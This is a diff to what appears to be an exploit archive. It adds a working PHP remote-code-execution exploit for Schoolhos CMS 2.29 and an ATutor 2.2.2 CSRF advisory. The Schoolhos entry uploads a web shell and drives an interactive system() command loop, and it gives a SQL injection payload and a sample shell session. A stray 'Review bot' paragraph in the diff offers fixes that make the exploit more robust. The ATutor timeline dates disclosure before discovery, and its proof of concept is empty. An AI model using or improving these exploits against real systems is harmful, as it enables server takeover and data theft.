diff --git a/files.csv b/files.csv
index a44aa2a73..8bf586700 100755
--- a/files.csv
+++ b/files.csv
@@ -36808,3 +36808,5 @@ id,file,description,date,author,platform,type,port
40749,platforms/php/webapps/40749.txt,"MyBB 1.8.6 - Cross-Site Scripting",2016-11-10,"Curesec Research Team",php,webapps,80
40750,platforms/php/webapps/40750.txt,"4Images 1.7.13 - SQL Injection",2016-11-10,0x4148,php,webapps,0
40751,platforms/php/webapps/40751.txt,"vBulletin 4.2.3 - 'ForumRunner' SQL Injection",2015-08-25,"Manish Tanwar",php,webapps,0
+40753,platforms/php/webapps/40753.php,"Schoolhos CMS 2.29 - Remote Code Execution / SQL Injection",2016-11-13,0x4148,php,webapps,0
+40755,platforms/php/webapps/40755.html,"ATutor 2.2.2 - Cross-Site Request Forgery (Add New Course)",2016-11-13,"Saravana Kumar",php,webapps,0
diff --git a/platforms/php/webapps/40753.php b/platforms/php/webapps/40753.php
new file mode 100755
index 000000000..e42662367
--- /dev/null
+++ b/platforms/php/webapps/40753.php
@@ -0,0 +1,165 @@
+\x0d\x0a-----------------------------26518470919255\x0d\x0a\x0d\x0a' \
+ 'http://HOST/PATH/elearningku/proses.php?pilih=guru&untukdi=upload'
+
+ php file can be ccessed via : http://HOST/PATH/file/materi/0x4148.php
+
+II - Unauthenticated sql injection
+
+ File : elearningku/download.php
+ Line 6
+ $file=mysql_query("SELECT * FROM sh_materi WHERE id_materi='$_GET[id]'");
+ $r=mysql_fetch_array($file);
+ $filename=$r[file_materi];
+
+ header("Content-Type: octet/stream");
+ header("Pragma: private");
+ header("Expires: 0");
+ header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
+ header("Cache-Control: private",false);
+ header("Content-Type: $ctype");
+ header("Content-Disposition: attachment; filename=\"".basename($filename)."\";" );
+ header("Content-Transfer-Encoding: binary");
+ header("Content-Length: ".filesize($dir.$filename));
+ readfile("$dir$filename");
+
+ POC : versi_2.29/elearningku/download.php?id=-1' union select 1,version(),3,4,5,6,7,8-- -
+ DB version will be showed as filename
+
+Script is really full of injection flaws , mentioning all of it is such waste of time
+
+Full exploitation Demo
+~0x4148fo# php scho.php http://192.168.0.50/lab/scho/versi_2.29/
+[*] Schoolhos CMS 2.29 Remote command execution
+[*] Author : Ahmed sultan (0x4148)
+[*] Connect : 0x4148.com | 0x4148@gmail.com
+
+ + Sending payload to http://192.168.0.50/lab/scho/versi_2.29/
+ + Payload sent successfully
+
+0x4148@http://192.168.0.50/lab/scho/versi_2.29/# dir
+ Volume in drive C is OS_Install
+ Volume Serial Number is D60F-0795
+
+ Directory of C:\xampp\htdocs\lab\scho\versi_2.29\file\materi
+
+11/13/2016 02:03 AM
.
+11/13/2016 02:03 AM ..
+11/13/2016 02:03 AM 47 0x4148.php
+11/30/2011 06:56 PM 8,522 aku.php
+11/29/2011 02:02 AM 74 Alar Reproduksi.rar
+11/29/2011 02:03 AM 74 albert.rar
+11/29/2011 08:25 PM 12,326 ari.png
+11/29/2011 08:27 PM 12,318 ari.rar
+11/29/2011 06:57 PM 74 cerita.rar
+11/29/2011 08:24 PM 0 contoh.txt
+11/29/2011 02:05 AM 74 dos.rar
+11/29/2011 02:01 AM 74 English1.rar
+12/12/2011 11:13 AM 117 index.html
+11/29/2011 02:10 AM 74 kekebalantubuh.rar
+11/29/2011 02:11 AM 74 masa jenis.rar
+11/29/2011 02:14 AM 74 office.rar
+11/29/2011 02:06 AM 74 paragraf.rar
+11/29/2011 02:04 AM 74 pemanasan.rar
+11/29/2011 02:00 AM 74 polakalimat.rar
+11/29/2011 02:15 AM 74 prepare.rar
+11/29/2011 02:13 AM 74 proklamator.rar
+11/29/2011 02:12 AM 74 sea games.rar
+11/29/2011 02:05 AM 74 soekarno.rar
+11/29/2011 02:09 AM 74 speaking.rar
+11/29/2011 02:15 AM 74 ulangan INDO.rar
+11/29/2011 02:11 AM 74 volume.rar
+ 24 File(s) 34,662 bytes
+ 2 Dir(s) 38,197,485,568 bytes free
+
+0x4148@http://192.168.0.50/lab/scho/versi_2.29/# exit
+
+~0x4148fo#
+
+*/
+$host=$argv[1];
+$target="$host/elearningku/proses.php?pilih=guru&untukdi=upload";
+echo "[*] Schoolhos CMS 2.29 Remote command execution\n";
+echo "[*] Author : Ahmed sultan (0x4148)\n";
+echo "[*] Connect : 0x4148.com | 0x4148@gmail.com\n\n";
+echo " + Sending payload to $host\n";
+fwrite(fopen("0x4148.php","w+"),'');
+$x4148upload = curl_init();
+curl_setopt($x4148upload, CURLOPT_URL, $target);
+curl_setopt($x4148upload, CURLOPT_USERAGENT, "mozilla");
+curl_setopt($x4148upload, CURLOPT_POST, 1);
+curl_setopt($x4148upload, CURLOPT_RETURNTRANSFER, true);
+curl_setopt($x4148upload, CURLOPT_POSTFIELDS,array("fupload"=>"@".realpath("0x4148.php")));
+curl_setopt($x4148upload, CURLOPT_SSL_VERIFYPEER, false);
+curl_setopt($x4148upload, CURLOPT_SSL_VERIFYHOST, 0);
+$result = curl_exec($x4148upload);
+curl_close($x4148upload);
+$x4148request=curl_init();
+curl_setopt($x4148request,CURLOPT_RETURNTRANSFER,1);
+curl_setopt($x4148request,CURLOPT_URL,$host."/file/materi/0x4148.php");
+curl_setopt($x4148request, CURLOPT_POSTFIELDS,"0x4148=".base64_encode("echo '0x4148fo';"));
+curl_setopt($x4148request, CURLOPT_SSL_VERIFYPEER, false);
+curl_setopt($x4148request, CURLOPT_SSL_VERIFYHOST, 0);
+curl_setopt($x4148request,CURLOPT_FOLLOWLOCATION,0);
+curl_setopt($x4148request,CURLOPT_TIMEOUT,20);
+curl_setopt($x4148request, CURLOPT_HEADER, true);
+$outp=curl_exec($x4148request);
+curl_close($x4148request);
+if(!preg_match("#0x4148fo#",$outp)){
+echo " - Failed :(\n";
+die();
+}
+echo " + Payload sent successfully\n\n";
+while(0<1){
+echo "0x4148@$host# ";
+$command=trim(fgets(STDIN));
+if($command=='exit'){
+die();
+}
+$x4148request=curl_init();
+curl_setopt($x4148request,CURLOPT_RETURNTRANSFER,1);
+curl_setopt($x4148request,CURLOPT_URL,$host."/file/materi/0x4148.php");
+curl_setopt($x4148request, CURLOPT_POSTFIELDS,"0x4148=".urlencode(base64_encode("echo '>>>>>';system('$command');echo '>>>>>';")));
+curl_setopt($x4148request, CURLOPT_SSL_VERIFYPEER, false);
+curl_setopt($x4148request, CURLOPT_SSL_VERIFYHOST, 0);
+curl_setopt($x4148request,CURLOPT_FOLLOWLOCATION,0);
+curl_setopt($x4148request,CURLOPT_TIMEOUT,20);
+curl_setopt($x4148request, CURLOPT_HEADER, true);
+$outp=curl_exec($x4148request);
+curl_close($x4148request);
+echo explode(">>>>>",$outp)[1]."\n";
+}
+?>
\ No newline at end of file
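Review bot: `$host=$argv[1];` on the first code line after the closing `*/` is read without checking that an argument was given, so running the script with no arguments emits an undefined array key warning and then sends its requests to the relative URL `/elearningku/proses.php?pilih=guru&untukdi=upload`; a guard such as `if ($argc < 2) { fwrite(STDERR, "usage: php 40753.php http://HOST/PATH\n"); exit(1); }` before that line would make the failure explicit. The `fwrite(fopen("0x4148.php","w+"),'')` line never checks the `fopen` result or closes the handle, and both `curl_exec` results (`$result`, `$outp`) are used without testing for `false`, so a transport error is reported by the `preg_match` check as the same " - Failed :(" message as a genuine negative result. The vulnerable snippet quoted in the header (`mysql_query` with `$_GET[id]` interpolated, then `readfile("$dir$filename")` on a database-supplied name) would benefit from a one-line remediation note — a parameterised query and restricting `$filename` to a basename inside the materi directory — since the advisory currently documents only the injection. The hunk header counts 165 added lines but the shown text starts mid-comment, so the file's opening `<?php` and the start of its header comment appear to lie outside what is visible here.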
diff --git a/platforms/php/webapps/40755.html b/platforms/php/webapps/40755.html
new file mode 100755
index 000000000..3fa2d5ade
--- /dev/null
+++ b/platforms/php/webapps/40755.html
@@ -0,0 +1,217 @@
+# Exploit Title: ATutor_2.2.2 Learning Management System
+# Cross-Site Request Forgery (Add New Course)
+# Date: 13-11-2016
+# Software Link: https://github.com/atutor/ATutor/releases/tag/atutor_2_2_2
+# Vendor: http://www.atutor.ca/
+# Exploit Author: Saravana Kumar
+# Contact: https://facebook.com/06saravanakumar
+# Category: webapps
+# Version: 2.2.2
+# Platform: PHP
+# Tested on: [Kali Linux 2.0 | Windows 7]
+# Email: 06saravanakumar@gmail.com
+# Affected URL:
+http://localhost/ATutor/mods/_core/courses/users/create_course.php
+
+==================================
+Vulnerability Disclosure Timeline:
==================================
2016-11-07: Found the vulnerability and Reported to Vendor.
2016-11-08: Vendor Replied.
2016-11-10: Vendor Fixed the vulnerability.
2016-11-11: Patch released
2016-10-12: Public Disclosure
+
+########################### CSRF PoC ###############################
+
+
+ <------ CSRF POC ------>
+
+
+
+
+
+
+---------------------------------------------------------------------------
+
+Solution:
+
+Patch is available. Install patch using the ATutor Patcher.
+
+Link to download patch:
+
+http://update.atutor.ca/patch/2_2_2/2_2_2-6/patch.xml
+---------------------------------------------------------------------------
+